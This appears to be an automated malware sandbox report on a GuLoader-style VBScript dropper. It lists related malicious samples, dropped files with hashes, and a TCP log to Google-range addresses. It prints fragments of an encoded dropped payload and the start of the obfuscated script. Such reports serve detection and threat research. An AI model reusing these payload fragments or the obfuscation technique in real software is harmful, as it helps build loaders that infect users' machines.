            3b5074b1b5d032e5620f69f9f700ff0eDHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbsGet hashmaliciousGuLoaderBrowse
            • 142.250.186.78
            • 142.250.186.161
            AF85714759_htm#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
            • 142.250.186.78
            • 142.250.186.161
            Zapytanie ofertowe (GASTRON 07022024).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 142.250.186.78
            • 142.250.186.161
            B24E33 ENQUIRY.vbeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 142.250.186.78
            • 142.250.186.161
            Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 142.250.186.78
            • 142.250.186.161
            AWB 3609 961.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
            • 142.250.186.78
            • 142.250.186.161
            MT_0615_60931PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 142.250.186.78
            • 142.250.186.161
            Doc230906103882.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 142.250.186.78
            • 142.250.186.161
            birectangular.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • 142.250.186.78
            • 142.250.186.161
            AWB#276097479258.pdf.htmlGet hashmaliciousUnknownBrowse
            • 142.250.186.78
            • 142.250.186.161

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

            Download File
            Process:C:\Windows\System32\wscript.exe
            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
            Category:dropped
            Size (bytes):71954
            Entropy (8bit):7.996617769952133
            Encrypted:true
            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

            Download File
            Process:C:\Windows\System32\wscript.exe
            File Type:data
            Category:modified
            Size (bytes):290
            Entropy (8bit):2.977525407934455
            Encrypted:false
            SSDEEP:6:kKf9Usw9L+N+SkQlPlEGYRMY9z+4KlDA3RUe/:mD9LNkPlE99SNxAhUe/
            MD5:4A30EF1B7F26B7CDAA89400AEF673C33
            SHA1:4107D209D55D7F3B8C00CB793854B06FC03084AC
            SHA-256:D464B22843452D1AF0957BE4165EEC8FF51DCAB8DD17685293363AD66089F293
            SHA-512:F4C39C026E074904ACF37E9E886B89AEA4072E23F62606B0D16C3F0F9F649744A6F9D4E571E1047C343AA271C7901203B2D056CBBBEEC6D9FF59B1C9B9950B00
            Malicious:false
            Reputation:low
            Preview:p...... ........W)......(....................................................... ........G..@.......................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3yfehvc.v3c.psm1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lf4slyuy.rhq.ps1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsjybhop.hxc.psm1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xygt1gtw.iip.ps1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Roaming\Noncongestion.For

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with very long lines (65536), with no line terminators
            Category:dropped
            Size (bytes):478064
            Entropy (8bit):5.942650349782987
            Encrypted:false
            SSDEEP:6144:4wiqKOJPs9EGgONiAwp/KxkuqL8V/3IUxYauPBoGNgXRbXTliQVU0q3Lz+axb00e:TxHO9/1hAzKGNghbg10qZxAJQxTw
            MD5:3A600DDCB6AB98E95B160AD99169DEC5
            SHA1:BEBC0A51DCE59B7D4187EDCE4911550F3A3694F5
            SHA-256:928225A9CFE9A6210B4F2993337B881F73C95EEAE938C1FA2D5C78EA27FE13E9
            SHA-512:0D588D65554709B4FB07CC475CCFC14A0F7D1B6881AA717822B68EFB5E2D4A777BB355A8704E321DCBA234297F7D13E68703C4C7BF87D810EF84DFD5DAFCDFB9
            Malicious:false
            Preview:6wLFEXEBm7uNVxwAcQGb6wI4dANcJATrAvid6wKDCrm+XMko6wLQi+sCR+aB8RgCj8NxAZvrApnMgfGmXkbr6wJ40nEBm+sCQu1xAZu6aHRKjOsC0jnrAjLWcQGb6wKEqjHK6wIegusCWWiJFAvrAiH66wJnw9HicQGbcQGbg8EE6wKWlesC/3aB+TMbrgV8yesCsXzrAil0i0QkBHEBm3EBm4nD6wIsOOsC/saBw+5gCwNxAZtxAZu6DXQEhesCSgtxAZuB8ko7ebbrAsAUcQGbgepHT30z6wLPnXEBm3EBm+sCydtxAZtxAZuLDBDrAkcq6wJsS4kME+sCqDrrAkfmQnEBm3EBm4H6bBQFAHXVcQGb6wJf4YlcJAzrAvRkcQGbge0AAwAAcQGb6wJBwYtUJAhxAZvrArQWi3wkBOsC987rAjbSievrAt0F6wKPQoHDnAAAAOsCuyLrAizWU+sC93nrAgTNakBxAZtxAZuJ63EBm+sCQ+vHgwABAAAAgM0F6wK2SHEBm4HDAAEAAOsCKB3rAnUNU+sCUirrAkRsietxAZtxAZuJuwQBAADrApEn6wJTP4HDBAEAAOsCb77rAnZUU+sC6vbrAl7eav9xAZvrAm2qg8IFcQGb6wIHQjH2cQGb6wK/PDHJcQGb6wLxFosa6wIdN3EBm0HrAvUgcQGbORwKdfPrAilKcQGbRusCDUrrApU4gHwK+7h13HEBm3EBm4tECvzrAtvscQGbKfBxAZvrAiEE/9JxAZtxAZu6bBQFAHEBm+sC3uExwOsCmdNxAZuLfCQMcQGbcQGbgTQHj54ri3EBm3EBm4PABOsCG9jrAhiAOdB15HEBm+sCaQmJ++sCFM/rAjjv/9frApZacQGbCkQTdwZ77A7DYdR0zAmnFg4rZ3RwYdy1y6eqDsNh1HRX0JnVDhtndHBhX4EKYmd0AtLUdHDr3N4Ge5L/xlPiCmbVIDuYH+pPanE1Cn5rCIZept4PVVlv

            Static File Info

            General

            File type:ASCII text, with CRLF line terminators
            Entropy (8bit):5.316607040408619
            TrID:
            • Visual Basic Script (13500/0) 100.00%
            File name:2669976595_366408723_KHI_SOF_240702_0957_P.vbs
            File size:23'446 bytes
            MD5:8a1a3c704c957d6638e61b5d4e4814a2
            SHA1:800fcc7219cab666231b2fc8c9fd7463160be8db
            SHA256:11a67ec7519d527b1351ba13a36ea0ef91b38a1be0c0d27dafdc9884c57a4894
            SHA512:bcbb9043cad5b297e2861b46db158687160ae4c6ca334e9e07ea41311d3c2953c795c56f334a3be8f7e8d811ab4085a9aeeae5e8502dfbfbce429dd02d912206
            SSDEEP:384:VEqYZPVyOeal1EJrjfOGHezbvVBwPcwerFyUBX/wxPR3V:VEqq1l+OGq4Pter4UqxP9V
            TLSH:64B2C89E7A2A0B5442E26BA3CFC70464B42C37654933F7992865B1D4C7076CEF41CAEB
            File Content Preview:..................Set Verena106 = CreateObject("WScript.Shell")..nyvurderingerne = -9780..Unauthorized = "Bhutansk. verdensmesterens."..Protesttog = &H5DBC..Superinjustice = &HFFFF3B7F..Disconcertedly28 = "Prakker; provocation;"..Omfangs = &H5521..Urease1

            File Icon

            Icon Hash:68d69b8f86ab9a86

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jul 3, 2024 08:54:44.467685938 CEST56535443192.168.2.8142.250.186.78
            Jul 3, 2024 08:54:44.467739105 CEST44356535142.250.186.78192.168.2.8
            Jul 3, 2024 08:54:44.467806101 CEST56535443192.168.2.8142.250.186.78
            Jul 3, 2024 08:54:44.473819971 CEST56535443192.168.2.8142.250.186.78
            Jul 3, 2024 08:54:44.473834991 CEST44356535142.250.186.78192.168.2.8
            Jul 3, 2024 08:54:45.126847029 CEST44356535142.250.186.78192.168.2.8
            Jul 3, 2024 08:54:45.126977921 CEST56535443192.168.2.8142.250.186.78
            Jul 3, 2024 08:54:45.127486944 CEST44356535142.250.186.78192.168.2.8
            Jul 3, 2024 08:54:45.127557039 CEST56535443192.168.2.8142.250.186.78
            Jul 3, 2024 08:54:45.129415989 CEST56535443192.168.2.8142.250.186.78
            Jul 3, 2024 08:54:45.129421949 CEST44356535142.250.186.78192.168.2.8
            Jul 3, 2024 08:54:45.129609108 CEST44356535142.250.186.78192.168.2.8
            Jul 3, 2024 08:54:45.137339115 CEST56535443192.168.2.8142.250.186.78
            Jul 3, 2024 08:54:45.184489965 CEST44356535142.250.186.78192.168.2.8
            Jul 3, 2024 08:54:45.514309883 CEST44356535142.250.186.78192.168.2.8
            Jul 3, 2024 08:54:45.515396118 CEST44356535142.250.186.78192.168.2.8
            Jul 3, 2024 08:54:45.515475988 CEST56535443192.168.2.8142.250.186.78
            Jul 3, 2024 08:54:45.518403053 CEST56535443192.168.2.8142.250.186.78
            Jul 3, 2024 08:54:45.528788090 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:45.528830051 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:45.528898001 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:45.529175997 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:45.529194117 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:46.163387060 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:46.163513899 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:46.165473938 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:46.165493011 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:46.165755987 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:46.168499947 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:46.216506958 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.048523903 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.048664093 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.053025961 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.053105116 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.065058947 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.065150023 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.065151930 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.065176010 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.065217018 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.071106911 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.113387108 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.140671968 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.141293049 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.141345978 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.141374111 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.141695023 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.141745090 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.141755104 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.142688036 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.142748117 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.142759085 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.148533106 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.148591995 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.148612022 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.154150009 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.154222012 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.154242039 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.160357952 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.160413027 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.160433054 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.166233063 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.166296005 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.166316032 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.172280073 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.172350883 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.172374964 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.177717924 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.177778959 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.177798986 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.183177948 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.183234930 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.183258057 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.188750982 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.188832045 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.188853025 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.203156948 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.203255892 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.203279972 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.220958948 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.221075058 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.221101999 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.221136093 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.221170902 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.221178055 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.221756935 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.221800089 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.221807957 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.222662926 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.222708941 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.222718954 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.227404118 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.227462053 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.227488995 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.233064890 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.233124971 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.233150005 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.237946033 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.238008022 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.238032103 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.242659092 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.242729902 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.242750883 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.247622967 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.247716904 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.247735977 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.251816034 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.251877069 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.251898050 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.258728981 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.258799076 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.258824110 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.260824919 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.260880947 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.260899067 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.265187979 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.265260935 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.265280008 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.269761086 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.269831896 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.269853115 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.273938894 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.274014950 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.274034023 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.278244019 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.278310061 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.278327942 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.282264948 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.282296896 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.282341957 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.282360077 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.282409906 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.286066055 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.289710045 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.289747953 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.289768934 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.289788008 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.289825916 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.293205976 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.296749115 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.296788931 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.296823025 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.296844959 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.296885967 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.300110102 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.303525925 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.303570032 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.303591967 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.303611994 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.303646088 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.307861090 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.310323000 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.310362101 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.310399055 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.310425043 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.310471058 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.313555002 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.315846920 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.315888882 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.315915108 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.315937042 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.315979958 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.317819118 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.319875002 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.319940090 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.319957018 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.324582100 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.324651003 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.324673891 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.325155973 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.325186968 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.325201035 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.325211048 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.325242996 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.325881958 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.327965021 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.328028917 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.328047991 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.330034971 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.330085039 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.330101967 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.332472086 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.332526922 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.332539082 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.332561016 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.332606077 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.334212065 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.336287022 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.336329937 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.336349964 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.338438034 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.338490009 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.338507891 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.340496063 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.340543985 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.340559959 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.342493057 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.342540026 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.342556000 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.344361067 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.344413042 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.344427109 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.346384048 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.346430063 CEST56536443192.168.2.8142.250.186.161
            Jul 3, 2024 08:54:47.346445084 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.348354101 CEST44356536142.250.186.161192.168.2.8
            Jul 3, 2024 08:54:47.348398924 CEST56536443192.168.2.8142.250.186.161
